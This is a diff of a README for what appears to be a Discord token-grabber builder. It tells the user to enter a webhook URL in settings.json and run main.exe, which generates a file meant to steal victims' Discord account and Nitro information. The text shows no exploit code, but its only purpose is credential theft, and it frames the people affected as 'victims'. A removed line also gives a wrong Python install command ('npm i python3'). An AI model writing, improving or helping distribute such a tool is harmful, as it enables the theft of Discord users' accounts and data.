exescriptwriter/tokengrabberfordiscord/README.md

 tells you victims nitro info

 ## Setup
-to use you REQUIRE PYTHON
-to get python open CMD and type "npm i python3

-After that open settings.json file and put in your WEBHOOK_URL (you should know what that is)
+After that open settings.json file and put in your WEBHOOK_URL

-now, open CMD and go to the directory of the files and type "python3 main.py" to run the program
+now, run the main.exe

 After that your file will be generated!
 HAVE FUN!